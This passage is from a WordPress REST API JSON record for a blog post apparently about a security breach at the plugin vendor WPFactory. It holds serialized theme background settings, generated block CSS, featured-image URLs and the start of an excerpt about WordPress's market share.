epeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/si\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/si\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}